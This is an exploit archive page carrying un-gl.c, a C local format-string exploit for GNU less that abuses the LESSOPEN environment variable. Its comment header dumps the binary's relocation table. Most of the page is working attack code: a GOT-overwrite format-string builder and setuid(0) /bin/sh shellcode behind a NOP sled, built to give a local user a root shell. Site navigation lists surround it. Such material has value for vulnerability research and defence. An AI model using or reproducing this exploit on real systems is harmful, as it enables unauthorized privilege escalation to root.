un-gl.c

un-gl.c: Posted Nov 2, 2005; Authored by unl0ck, Darkeagle | Site exploiterz.org; GNU less local exploit.; tags | local; SHA-256 | 58a7a9a42bea20075104c3381ea5615bb56bb62a0b6c2d5e9eb359d26ba79dc6; Download | Favorite | View

un-gl.c

/*        GNU LESS LOCAL FORMAT STRING EXPLOIT


/usr/bin/less:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
0805fd98 R_386_GLOB_DAT    __gmon_start__
0805fda0 R_386_COPY        ospeed
0805fda2 R_386_COPY        PC
0805fda4 R_386_COPY        stdin
0805fc94 R_386_JUMP_SLOT   fgetc
0805fc98 R_386_JUMP_SLOT   tgetnum
0805fc9c R_386_JUMP_SLOT   strchr
0805fca0 R_386_JUMP_SLOT   getpid
0805fca4 R_386_JUMP_SLOT   __ctype_tolower_loc
0805fca8 R_386_JUMP_SLOT   tgoto
0805fcac R_386_JUMP_SLOT   regexec
0805fcb0 R_386_JUMP_SLOT   _longjmp
0805fcb4 R_386_JUMP_SLOT   write
0805fcb8 R_386_JUMP_SLOT   fileno
0805fcbc R_386_JUMP_SLOT   strcmp
0805fcc0 R_386_JUMP_SLOT   close
0805fcc4 R_386_JUMP_SLOT   getenv
0805fcc8 R_386_JUMP_SLOT   signal
0805fccc R_386_JUMP_SLOT   regfree
0805fcd0 R_386_JUMP_SLOT   pclose
0805fcd4 R_386_JUMP_SLOT   tgetflag
0805fcd8 R_386_JUMP_SLOT   strerror
0805fcdc R_386_JUMP_SLOT   tcsetattr
0805fce0 R_386_JUMP_SLOT   setlocale
0805fce4 R_386_JUMP_SLOT   __errno_location
0805fce8 R_386_JUMP_SLOT   system
0805fcec R_386_JUMP_SLOT   popen
0805fcf0 R_386_JUMP_SLOT   cfgetospeed
0805fcf4 R_386_JUMP_SLOT   time
0805fcf8 R_386_JUMP_SLOT   creat64
0805fcfc R_386_JUMP_SLOT   tputs
0805fd00 R_386_JUMP_SLOT   fgets
0805fd04 R_386_JUMP_SLOT   strstr
0805fd08 R_386_JUMP_SLOT   strlen
0805fd0c R_386_JUMP_SLOT   sleep
0805fd10 R_386_JUMP_SLOT   __strtol_internal
0805fd14 R_386_JUMP_SLOT   lseek64
0805fd18 R_386_JUMP_SLOT   strncmp
0805fd1c R_386_JUMP_SLOT   __xstat64
0805fd20 R_386_JUMP_SLOT   fsync
0805fd24 R_386_JUMP_SLOT   __libc_start_main
0805fd28 R_386_JUMP_SLOT   tgetent
0805fd2c R_386_JUMP_SLOT   sigsetmask
0805fd30 R_386_JUMP_SLOT   strcat
0805fd34 R_386_JUMP_SLOT   printf
0805fd38 R_386_JUMP_SLOT   memcpy
0805fd3c R_386_JUMP_SLOT   open64
0805fd40 R_386_JUMP_SLOT   fclose
0805fd44 R_386_JUMP_SLOT   __ctype_toupper_loc
0805fd48 R_386_JUMP_SLOT   fopen64
0805fd4c R_386_JUMP_SLOT   regcomp
0805fd50 R_386_JUMP_SLOT   exit
0805fd54 R_386_JUMP_SLOT   calloc
0805fd58 R_386_JUMP_SLOT   _IO_putc
0805fd5c R_386_JUMP_SLOT   free
0805fd60 R_386_JUMP_SLOT   ioctl
0805fd64 R_386_JUMP_SLOT   isatty
0805fd68 R_386_JUMP_SLOT   strncpy
0805fd6c R_386_JUMP_SLOT   dup
0805fd70 R_386_JUMP_SLOT   _setjmp
0805fd74 R_386_JUMP_SLOT   kill
0805fd78 R_386_JUMP_SLOT   sprintf <----------------------------
0805fd7c R_386_JUMP_SLOT   _IO_getc
0805fd80 R_386_JUMP_SLOT   __ctype_b_loc
0805fd84 R_386_JUMP_SLOT   tgetstr
0805fd88 R_386_JUMP_SLOT   tcgetattr
0805fd8c R_386_JUMP_SLOT   read
0805fd90 R_386_JUMP_SLOT   __fxstat64
0805fd94 R_386_JUMP_SLOT   strcpy

EXAMPLE IN MANDRAKE LINUX 10.0 OR.

bug exists in filename.c 

<<
sprintf(cmd, lessopen, filename);
>>

you can exploit it. to exploit u need to set LESSOPEN ENV. VAR.
and execute less with some filename (maybe non-existen). 

*/

#include <stdio.h>
#include <string.h>

char buf[100];

char shellcode[] = // 1337 unl0ck team small shellcode with setuid(0) ;) 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

long getsp() 
{
__asm__("movl %esp,%eax");
}

char *cfstr(long GOT, long RET, int ALIGN) {

  long high,low;
  memset(buf,0x00,sizeof(buf));

  high = (RET >> 16) & 0xffff; 
  low = RET & 0xffff; 

  sprintf(buf,"%c%c%c%c%c%c%c%c%%.%dx%%%d$hn%%.%dx%%%d$hn",
    (char)((GOT&0xff)+2),(char)((GOT>>8)&0xff),(char)((GOT>>16)&0xff),(char)((GOT>>24)&0xff),
    (char)(GOT&0xff),(char)((GOT>>8)&0xff),(char)((GOT>>16)&0xff),(char)((GOT>>24)&0xff),
    (high>low)?(low-8):(high-8),
    (high>low)?(ALIGN+1):(ALIGN),
    (high>low)?(high-low):(low-high),
    (high>low)?(ALIGN):(ALIGN+1));

  return buf;

}

int main(int argc, char **argv) {

  long GOT;
  long RET;
  int ALIGN = 2,off=0;

  char *less ,buff[100], exploit[1000];
  char *enva, *genva;

  less = (char *)malloc(1000);
  
  enva = "LESSOPEN";
  
  printf("[~] creating shellcode...\n");
  sprintf(less, "LESSFUCK=");
        memset(less + 4, 0x90, 1000-1-strlen(shellcode));
  sprintf(less + 1000-1-strlen(shellcode), "%s", shellcode);

  if(argc == 1) 
  { 
  printf("Usage: %s <OFFSET> <GOT>\n", argv[0]); 
  exit(0); 
  }

        if(argc >= 2) 
  { 
  off = atoi(argv[1]);
  RET = getsp() + off;
  }

  if(argc >= 3) 
  sscanf(argv[2], "0x%x", &GOT);

        printf("[~] shellcode addr: 0x%x, OFFSET: %d, GOT: 0x%x\n",RET,off,GOT);

  memset(buff, 0x00, sizeof(buf));
  sprintf(buff, "%s", cfstr(GOT+4,RET,ALIGN));
  printf("[~] creating exploit...\n");
  sprintf(exploit, "%s%s", buff, less);

  if ( setenv(enva, exploit, 1) == 0 ) printf("[+] var successfully set!\n");
  if ( setenv(enva, exploit, 1) == -1 ) { printf("[-] failed! exiting...\n"); exit(0);}

  //execl("/usr/bin/less", "/usr/bin/less", "-f", "a", NULL);
  system("less -f a");
  return 0;
}

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 60 files
Debian 19 files
Gentoo 8 files
Apple 5 files
Google Security Research 4 files
Jann Horn 3 files
Spencer McIntyre 3 files
LiquidWorm 3 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

un-gl.c

un-gl.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

un-gl.c

Share This

un-gl.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems